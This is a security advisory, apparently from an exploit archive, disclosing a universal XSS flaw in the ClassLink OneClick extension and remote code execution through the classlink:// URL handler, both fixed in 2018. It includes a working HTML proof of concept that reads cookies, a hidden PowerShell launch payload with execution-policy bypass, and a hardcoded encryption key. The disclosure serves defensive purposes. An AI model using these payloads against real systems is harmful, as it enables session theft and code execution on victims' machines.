
ClassLink OneClick Browser Extension / Agent Universal XSS / Remote Code Execution
Posted Jun 8, 2018
Authored by EdTech Secure

The ClassLink OneClick browser extension and the ClassLink Agent are vulnerable to universal cross site scripting and remote code execution.

tags | exploit, remote, code execution, xss
SHA-256 | 9009c6063cf45f973ccdc5297fed83759e8c4e593bf42a2455d616f09143e5c4

The ClassLink OneClick Browser Extension and the ClassLink Agent are vulnerable to Universal XSS and Remote Code Execution. The vendor released software updates fixing both vulnerabilities on 3 June 2018.

=== Vendor ===
ClassLink: https://www.classlink.com

=== Vulnerability #1: Universal XSS through the OneClick Extension ===

To log users into websites, the ClassLink OneClick Extension injects JavaScript into the target webpage to perform the login. To begin this flow, a user visits a page that contains metadata about the target and the JavaScript to be injected. This page is not authenticated, which means it can be trivially forged by an attacker.

The extension only looks for URLs that contain the string "browsersso/". If that is found, it looks in the "head" tag for a login_url and scripts, such as pre_auth_script. Neither these fields nor the page itself is authenticated in any way.

An attacker could create a page that contains the correct string in the URL and include a script that navigates to any website and executes JavaScript there to steal information such as cookies, API keys, saved credentials or any other private information. This could then be posted to the attacker's server. A user simply visiting the page would trigger the attack.

Here is a simple proof of concept:

<!doctype html>
<html>
<head>
<title>.</title>
<script type="text">
appResponse: var x = {}; x.selectors = []; x.userauth = []; x.login_url = "https://google.com"; x.pre_auth_script = "alert('XSS running on Google. document.cookie = ' + document.cookie)"; x,
gwstokenMd5: x,
</script>
</head>
<body>.</body>
</html>

If this page is hosted at any URL that contains "browsersso/" and is visited by a user with the ClassLink OneClick Extension installed, the extension will automatically navigate to Google and show an alert box containing the user's current cookies for https://google.com, with no user interaction. A malicious script could instead post this, or any other private information on the page, to a remote server.

=== Vulnerability #2: Remote Code Execution Using classlink:// URL Protocol ===

The classlink:// URL protocol allows links to launch executables or open files on the system. This protocol is enabled by installing the ClassLink Agent.

The links contain a JSON-encoded payload encrypted with DES in ECB mode under a static symmetric key, "234hyg32", hardcoded into the executable. The payload is not authenticated.

Because the payload is not authenticated in any way (the encryption does not function as authentication in this context), it can be arbitrarily modified. Since these URLs can launch executables with arbitrary parameters, this is trivially leveraged into remote code execution through PowerShell or other local scripting environments included with Windows. For example, consider the following payload:

{
"LocalAppLaunchType": "localapp",
"path": [
"%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
],
"param": "-exec\" bypass -windowstyle hidden -c \"[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('This is an code execution proof on concept. The current logged in user is ' + [System.Security.Principal.WindowsIdentity]::GetCurrent().Name)",
"ignorepath": 0
}

This proof of concept runs a PowerShell command that shows the currently logged-in user in a message box. The example payload can be encoded into the following URL, which will execute if clicked:

classlink:?token=...

Alternatively, this link can be clicked automatically with JavaScript, so that visiting a web page is all that is required to trigger it. The example can be modified to run any command, such as downloading another executable from a remote source and executing it, allowing for the silent installation of malware just by visiting an attacker-controlled web page.

Additionally, the encryption used for the payload is not adequate for modern use. Single DES is a deprecated standard that was withdrawn from recommended use in October 1999. ECB mode exposes the encrypted data itself to a large number of attacks. The key size and character set also lack the entropy needed for sufficient strength: a simple brute-force search on a modest machine could recover the key in approximately 24 hours.

=== Timeline ===

April 14th, 2018 - Reached out to vendor
May 7th, 2018 - Reply from vendor, sent disclosure
May 8th, 2018 - Vendor verified the issue and began working on a fix
June 3rd, 2018 - Vendor confirmed fixes have been released
